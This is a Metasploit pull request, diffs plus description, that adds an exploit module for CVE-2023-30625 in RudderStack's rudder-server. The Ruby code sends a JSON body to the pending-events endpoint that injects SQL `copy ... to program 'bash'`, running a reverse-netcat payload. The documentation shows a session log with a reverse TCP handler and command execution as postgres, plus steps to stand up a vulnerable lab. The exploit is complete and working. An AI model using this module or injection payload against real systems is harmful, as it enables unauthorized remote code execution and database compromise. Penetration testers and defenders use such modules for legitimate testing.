### PR TITLE
Add rudder-server SQLI RCE (CVE-2023-30625) exploit

### DIFF
--- a/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
+++ b/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
@@ -1,0 +1,69 @@
+## Vulnerable Application
+
+RudderStack is an open-source Customer Data Platform (CDP) that helps organizations collect,
+unify, and route customer data to various destinations.
+A Customer Data Platform is a software system that centralizes and manages customer data from multiple sources,
+providing a unified view of customer interactions and behaviors.
+RudderStack is an independent, stand-alone system with a dependency only on the database (PostgreSQL).
+Its backend is written in Go with a rich UI written in React.js.
+
+This Metasploit exploit module targets a SQL injection vulnerability (CVE-2023-30625) in RudderStack's `rudder-server`,
+an open-source Customer Data Platform (CDP). The vulnerability affects versions of `rudder-server` before 1.3.0-rc.1.
+By exploiting this flaw, an attacker can execute arbitrary SQL commands,
+potentially leading to Remote Code Execution (RCE) since the `rudder` role in PostgresSQL has superuser permissions by default.
+This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).
+Check [here](https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/) for full disclosure writeup.
+
+## Testing
+For installing the vulnerable version follow the steps below,
+1. Clone the repository `git clone https://github.com/rudderlabs/rudder-server`
+2. Switch to version 1.2.5 `cd rudder-server && git checkout v1.2.5`
+3. At this step you'll need to obtain a workspace token from the RudderStack platform.
+[Check](https://www.rudderstack.com/docs/get-started/rudderstack-open-source/data-plane-setup/docker/#workspace-token) for instructions.
+4. After obtaining the workspace token adjust your `./build/docker.env` file.
+5. Change `DEST_TRANSFORM_URL=http://d-transformer:9090` to `DEST_TRANSFORM_URL=http://transformer:9090` inside `./build/docker.env` file.
+6. Finally run `docker compose up` at the root directory of the project git.
+
+After these steps the rudder-server API will be expopsed on the `http://localhost:8080/` address.
+
+## Verification Steps
+
+1. msfconsole
+2. Do: `use exploit/multi/http/rudder_server_sqli_rce`
+3. Do: `set RHOST [IP]`
+4. Do: `set RPORT [PORT]`
+5. Do: `check`
+6. You should get a shell.
+
+## Options
+
+### API_USER
+The Rudder API basic authentication username (Default: 'key'). (Optional)
+
+### API_PASS
+The Rudder API basic authentication password. (Optional)
+
+## Scenarios
+
+```
+msf6 > use exploit/multi/http/rudder_server_sqli_rce 
+[*] Using configured payload cmd/unix/reverse_netcat
+msf6 exploit(multi/http/rudder_server_sqli_rce) > set rhosts 192.168.1.20
+rhosts => 192.168.1.20
+msf6 exploit(multi/http/rudder_server_sqli_rce) > set lhost 192.168.1.10
+lhost => 192.168.1.10
+msf6 exploit(multi/http/rudder_server_sqli_rce) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/rudder_server_sqli_rce) > set ForceExploit true
+ForceExploit => true
+msf6 exploit(multi/http/rudder_server_sqli_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.10:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
+[*] Detected rudder version: Unknown
+[*] Triggering RCE via crafted SQL query...
+id
+uid=70(postgres) gid=70(postgres) groups=70(postgres),70(postgres)
+
+```

--- a/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
+++ b/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
@@ -24,7 +24,7 @@ For installing the vulnerable version follow the steps below,
 5. Change `DEST_TRANSFORM_URL=http://d-transformer:9090` to `DEST_TRANSFORM_URL=http://transformer:9090` inside `./build/docker.env` file.
 6. Finally run `docker compose up` at the root directory of the project git.
 
-After these steps the rudder-server API will be expopsed on the `http://localhost:8080/` address.
+After these steps the rudder-server API will be exposed on the `http://localhost:8080/` address.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
+++ b/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
@@ -16,13 +16,12 @@ Check [here](https://securitylab.github.com/advisories/GHSL-2022-097_rudder-serv
 
 ## Testing
 For installing the vulnerable version follow the steps below,
-1. Clone the repository `git clone https://github.com/rudderlabs/rudder-server`
-2. Switch to version 1.2.5 `cd rudder-server && git checkout v1.2.5`
-3. At this step you'll need to obtain a workspace token from the RudderStack platform.
-[Check](https://www.rudderstack.com/docs/get-started/rudderstack-open-source/data-plane-setup/docker/#workspace-token) for instructions.
-4. After obtaining the workspace token adjust your `./build/docker.env` file.
-5. Change `DEST_TRANSFORM_URL=http://d-transformer:9090` to `DEST_TRANSFORM_URL=http://transformer:9090` inside `./build/docker.env` file.
-6. Finally run `docker compose up` at the root directory of the project git.
+1. Download [docker-compose.yml](https://raw.githubusercontent.com/rudderlabs/rudder-server/master/rudder-docker.yml) file.
+2. Replace `<your_workspace_token>` in this file with your workspace workspace-token
+Check [here](https://www.rudderstack.com/docs/get-started/rudderstack-open-source/data-plane-setup/docker/#workspace-token)
+for obtaining workspace-token.
+3. Edit `rudder-server:latest` version as `rudder-server:1.2.5` inside the docker-compose.yml file.
+4. Run `docker compose -f rudder-docker.yml up -d`
 
 After these steps the rudder-server API will be exposed on the `http://localhost:8080/` address.
 
@@ -54,8 +53,6 @@ msf6 exploit(multi/http/rudder_server_sqli_rce) > set lhost 192.168.1.10
 lhost => 192.168.1.10
 msf6 exploit(multi/http/rudder_server_sqli_rce) > set lport 4444
 lport => 4444
-msf6 exploit(multi/http/rudder_server_sqli_rce) > set ForceExploit true
-ForceExploit => true
 msf6 exploit(multi/http/rudder_server_sqli_rce) > run
 
 [*] Started reverse TCP handler on 192.168.1.10:4444 

--- a/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
+++ b/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
@@ -10,7 +10,7 @@ Its backend is written in Go with a rich UI written in React.js.
 This Metasploit exploit module targets a SQL injection vulnerability (CVE-2023-30625) in RudderStack's `rudder-server`,
 an open-source Customer Data Platform (CDP). The vulnerability affects versions of `rudder-server` before 1.3.0-rc.1.
 By exploiting this flaw, an attacker can execute arbitrary SQL commands,
-potentially leading to Remote Code Execution (RCE) since the `rudder` role in PostgresSQL has superuser permissions by default.
+potentially leading to Remote Code Execution (RCE) since the `rudder` role in PostgreSQL has superuser permissions by default.
 This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).
 Check [here](https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/) for full disclosure writeup.
 

--- a/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
+++ b/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
@@ -36,12 +36,6 @@ After these steps the rudder-server API will be exposed on the `http://localhost
 
 ## Options
 
-### API_USER
-The Rudder API basic authentication username (Default: 'key'). (Optional)
-
-### API_PASS
-The Rudder API basic authentication password. (Optional)
-
 ## Scenarios
 
 ```

--- a/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
+++ b/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
@@ -14,6 +14,9 @@ potentially leading to Remote Code Execution (RCE) since the `rudder` role in Po
 This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).
 Check [here](https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/) for full disclosure writeup.
 
+**Note: The backend code of rudder-server is written with Golang and can also be compiled for Windows.
+Due to the insufficient build instructions for Windows platforms, the Windows target is disabled in this exploit module.**
+
 ## Testing
 For installing the vulnerable version follow the steps below,
 1. Download [docker-compose.yml](https://raw.githubusercontent.com/rudderlabs/rudder-server/master/rudder-docker.yml) file.

--- a/modules/exploits/multi/http/rudder_server_sqli_rce.rb
+++ b/modules/exploits/multi/http/rudder_server_sqli_rce.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     version = get_version
-    return Exploit::CheckCode::Unknown if version.nil? or version == 'Unknown'
+    return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'
 
     if Rex::Version.new('1.2') >= Rex::Version.new(version.gsub('v', ''))
       Exploit::CheckCode::Appears("Rudder Version: #{version}")

--- a/modules/exploits/multi/http/rudder_server_sqli_rce.rb
+++ b/modules/exploits/multi/http/rudder_server_sqli_rce.rb
@@ -65,15 +65,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     version = get_version
-    if version.match(/^[01]\.[012]/) # v0.*.* - v1.2*
+    return Exploit::CheckCode::Unknown if verion.nil? or version == 'Unknown'
+    
+    if Rex::Version.new('1.2') >= Rex::Version.new(version.gsub('v', ''))
       Exploit::CheckCode::Appears("Rudder Version: #{version}")
-    else
-      if version == 'Unknown'
-        return Exploit::CheckCode::Unknown
-      end
-
-      Exploit::CheckCode::Safe
     end
+    Exploit::CheckCode::Safe
   end
 
   def get_version

--- a/modules/exploits/multi/http/rudder_server_sqli_rce.rb
+++ b/modules/exploits/multi/http/rudder_server_sqli_rce.rb
@@ -50,7 +50,17 @@ class MetasploitModule < Msf::Exploit::Remote
               }
             }
           ],
-          ['Windows', { 'DefaultOptions' => { 'PAYLOAD' => 'windows/powershell_reverse_tcp' } }],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_netcat'
+              }
+            }
+          ],
         ],
         'DefaultTarget' => 0,
         'Privileged' => false,
@@ -75,8 +85,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     version = get_version
-    return Exploit::CheckCode::Unknown if verion.nil? or version == 'Unknown'
-    
+    return Exploit::CheckCode::Unknown if version.nil? or version == 'Unknown'
+
     if Rex::Version.new('1.2') >= Rex::Version.new(version.gsub('v', ''))
       Exploit::CheckCode::Appears("Rudder Version: #{version}")
     end
@@ -84,17 +94,19 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_version
+    return @get_version if @get_version
+
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'version')
     )
     if res && res.code == 200
-      ver = res.get_json_document['Version']
-      if ver.empty?
-        return 'Unknown'
+      @get_version = res.get_json_document['Version']
+      if @get_version.empty?
+        @get_version = 'Unknown'
       end
 
-      ver
+      @get_version
     end
   end
 
@@ -107,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :unix_cmd
       shell = 'bash'
     else
-     fail_with(Failure::BadConfig, 'Please select a valid target')
+      fail_with(Failure::BadConfig, 'Please select a valid target')
     end
 
     data = "{\"source_id\": \"#{Rex::Text.rand_text_alpha(4..8)}'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}"

--- a/modules/exploits/multi/http/rudder_server_sqli_rce.rb
+++ b/modules/exploits/multi/http/rudder_server_sqli_rce.rb
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
       shell = 'cmd.exe'
     end
 
-    data = "{\"source_id\": \"yeet!'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}"
+    data = "{\"source_id\": \"#{Rex::Text.rand_text_alpha(4..8)}'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}"
     print_status 'Triggering RCE via crafted SQL query...'
     send_request_cgi({
       'method' => 'POST',

--- a/modules/exploits/multi/http/rudder_server_sqli_rce.rb
+++ b/modules/exploits/multi/http/rudder_server_sqli_rce.rb
@@ -49,17 +49,17 @@ class MetasploitModule < Msf::Exploit::Remote
               }
             }
           ],
-          [
-            'Windows Command',
-            {
-              'Platform' => 'win',
-              'Arch' => ARCH_CMD,
-              'Type' => :win_cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/windows/powershell_reverse_netcat'
-              }
-            }
-          ],
+          # [
+          #   'Windows Command',
+          #   {
+          #     'Platform' => 'win',
+          #     'Arch' => ARCH_CMD,
+          #     'Type' => :win_cmd,
+          #     'DefaultOptions' => {
+          #       'PAYLOAD' => 'cmd/windows/powershell_reverse_netcat'
+          #     }
+          #   }
+          # ],
         ],
         'DefaultTarget' => 0,
         'Privileged' => false,
@@ -112,8 +112,8 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status "Detected rudder version: #{get_version}"
     # If not 'Auto' then use the selected version
     case target['Type']
-    when :win_cmd
-      shell = 'cmd.exe'
+    # when :win_cmd
+    #   shell = 'cmd.exe'
     when :unix_cmd
       shell = 'bash'
     else

--- a/modules/exploits/multi/http/rudder_server_sqli_rce.rb
+++ b/modules/exploits/multi/http/rudder_server_sqli_rce.rb
@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     data = "{\"source_id\": \"yeet!'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}"
     print_status 'Triggering RCE via crafted SQL query...'
-    res = send_request_cgi({
+    send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/v1/warehouse/pending-events'),
       'authorization' => basic_auth(datastore['API_USER'], datastore['API_PASS']),

--- a/modules/exploits/multi/http/rudder_server_sqli_rce.rb
+++ b/modules/exploits/multi/http/rudder_server_sqli_rce.rb
@@ -76,8 +76,6 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(8080),
         OptString.new('TARGETURI', [true, 'The URI of the Rudder API', '/']),
-        OptString.new('API_USER', [false, 'The Rudder API basic authentication username', 'key']),
-        OptString.new('API_PASS', [false, 'The Rudder API basic authentication password', '']),
       ]
     )
   end
@@ -127,7 +125,6 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/v1/warehouse/pending-events'),
-      'authorization' => basic_auth(datastore['API_USER'], datastore['API_PASS']),
       'ctype' => 'application/json',
       'data' => data
     })

--- a/modules/exploits/multi/http/rudder_server_sqli_rce.rb
+++ b/modules/exploits/multi/http/rudder_server_sqli_rce.rb
@@ -91,9 +91,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     print_status "Detected rudder version: #{get_version}"
     # If not 'Auto' then use the selected version
-    shell = 'bash'
-    if target == targets[2]
+    case target['Type']
+    when :win_cmd
       shell = 'cmd.exe'
+    when :unix_cmd
+      shell = 'bash'
+    else
+     fail_with(Failure::BadConfig, 'Please select a valid target')
     end
 
     data = "{\"source_id\": \"#{Rex::Text.rand_text_alpha(4..8)}'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}"

--- a/modules/exploits/multi/http/rudder_server_sqli_rce.rb
+++ b/modules/exploits/multi/http/rudder_server_sqli_rce.rb
@@ -39,7 +39,17 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
         'Targets' => [
           ['Automatic', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } }],
-          ['Linux', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } }],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
           ['Windows', { 'DefaultOptions' => { 'PAYLOAD' => 'windows/powershell_reverse_tcp' } }],
         ],
         'DefaultTarget' => 0,

--- a/modules/exploits/multi/http/rudder_server_sqli_rce.rb
+++ b/modules/exploits/multi/http/rudder_server_sqli_rce.rb
@@ -38,11 +38,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => [ 'unix', 'linux' ],
         'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
         'Targets' => [
-          ['Automatic', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } }],
           [
             'Unix Command',
             {
-              'Platform' => 'unix',
+              'Platform' => %w[unix linux],
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
               'DefaultOptions' => {
@@ -87,9 +86,10 @@ class MetasploitModule < Msf::Exploit::Remote
     version = get_version
     return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'
 
-    if Rex::Version.new('1.2') >= Rex::Version.new(version.gsub('v', ''))
-      Exploit::CheckCode::Appears("Rudder Version: #{version}")
+    if Rex::Version.new('1.3.0-rc.1') > Rex::Version.new(version.gsub('v', ''))
+      return Exploit::CheckCode::Appears("Rudder Version: #{version}")
     end
+
     Exploit::CheckCode::Safe
   end
 

--- a/modules/exploits/multi/http/rudder_server_sqli_rce.rb
+++ b/modules/exploits/multi/http/rudder_server_sqli_rce.rb
@@ -1,0 +1,112 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Rudder Server SQLI Remote Code Execution',
+        'Description' => %q{
+          This Metasploit module exploits a SQL injection vulnerability in
+          RudderStack's rudder-server, an open source Customer Data Platform (CDP).
+          The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.
+          By exploiting this flaw, an attacker can execute arbitrary SQL commands,
+          which may lead to Remote Code Execution (RCE) due to the `rudder` role
+          in PostgresSQL having superuser permissions by default.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ege Balcı <egebalci@pm.me>' # msf module
+        ],
+        'References' => [
+          ['CVE', '2023-30625'],
+          ['URL', 'https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30625'],
+        ],
+        'DefaultOptions' => {
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
+        'Platform' => [ 'unix', 'linux' ],
+        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          ['Automatic', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } }],
+          ['Linux', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } }],
+          ['Windows', { 'DefaultOptions' => { 'PAYLOAD' => 'windows/powershell_reverse_tcp' } }],
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2023-06-16',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true, 'The URI of the Rudder API', '/']),
+        OptString.new('API_USER', [false, 'The Rudder API basic authentication username', 'key']),
+        OptString.new('API_PASS', [false, 'The Rudder API basic authentication password', '']),
+      ]
+    )
+  end
+
+  def check
+    version = get_version
+    if version.match(/^[01]\.[012]/) # v0.*.* - v1.2*
+      Exploit::CheckCode::Appears("Rudder Version: #{version}")
+    else
+      if version == 'Unknown'
+        return Exploit::CheckCode::Unknown
+      end
+
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def get_version
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'version')
+    )
+    if res && res.code == 200
+      ver = res.get_json_document['Version']
+      if ver.empty?
+        return 'Unknown'
+      end
+
+      ver
+    end
+  end
+
+  def exploit
+    print_status "Detected rudder version: #{get_version}"
+    # If not 'Auto' then use the selected version
+    shell = 'bash'
+    if target == targets[2]
+      shell = 'cmd.exe'
+    end
+
+    data = "{\"source_id\": \"yeet!'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}"
+    print_status 'Triggering RCE via crafted SQL query...'
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/v1/warehouse/pending-events'),
+      'authorization' => basic_auth(datastore['API_USER'], datastore['API_PASS']),
+      'ctype' => 'application/json',
+      'data' => data
+    })
+  end
+end

--- a/modules/exploits/multi/http/rudder_server_sqli_rce.rb
+++ b/modules/exploits/multi/http/rudder_server_sqli_rce.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
           The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.
           By exploiting this flaw, an attacker can execute arbitrary SQL commands,
           which may lead to Remote Code Execution (RCE) due to the `rudder` role
-          in PostgresSQL having superuser permissions by default.
+          in PostgreSQL having superuser permissions by default.
         },
         'License' => MSF_LICENSE,
         'Author' => [


### PR DESCRIPTION
Hello :wave: 

This module is exploiting a SQL injection vulnerability (CVE-2023-30625) in RudderStack's `rudder-server`,
an open-source Customer Data Platform (CDP). The vulnerability affects versions of `rudder-server` before 1.3.0-rc.1.
By exploiting this flaw, an attacker can execute arbitrary SQL commands,
potentially leading to Remote Code Execution (RCE) since the `rudder` role in PostgresSQL has superuser permissions by default.

This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).
Check [here](https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/) for full disclosure writeup.

## Testing Environment Setup
For installing the vulnerable version follow the steps below,
1. Clone the repository `git clone https://github.com/rudderlabs/rudder-server`
2. Switch to version 1.2.5 `cd rudder-server && git checkout v1.2.5`
3. At this step you'll need to obtain a workspace token from the RudderStack platform. Check [here](https://www.rudderstack.com/docs/get-started/rudderstack-open-source/data-plane-setup/docker/#workspace-token) for instructions.
4. After obtaining the workspace token adjust your `./build/docker.env` file.
5. Change `DEST_TRANSFORM_URL=http://d-transformer:9090` to `DEST_TRANSFORM_URL=http://transformer:9090` inside `./build/docker.env` file.
6. Finally run `docker compose up` at the root directory of the project git.

After these steps the rudder-server API will be exposed on the `http://localhost:8080/` address.

***!! Make sure that your docker containers can connect back to your Metasploit host for receiving a reverse shell !!***

## Verification

List the steps needed to make sure this thing works

- [ ] msfconsole
- [ ] Do: `use exploit/multi/http/rudder_server_sqli_rce`
- [ ] Do: `set RHOST [IP]`
- [ ] Do: `set RPORT [PORT]`
- [ ] Do: `check`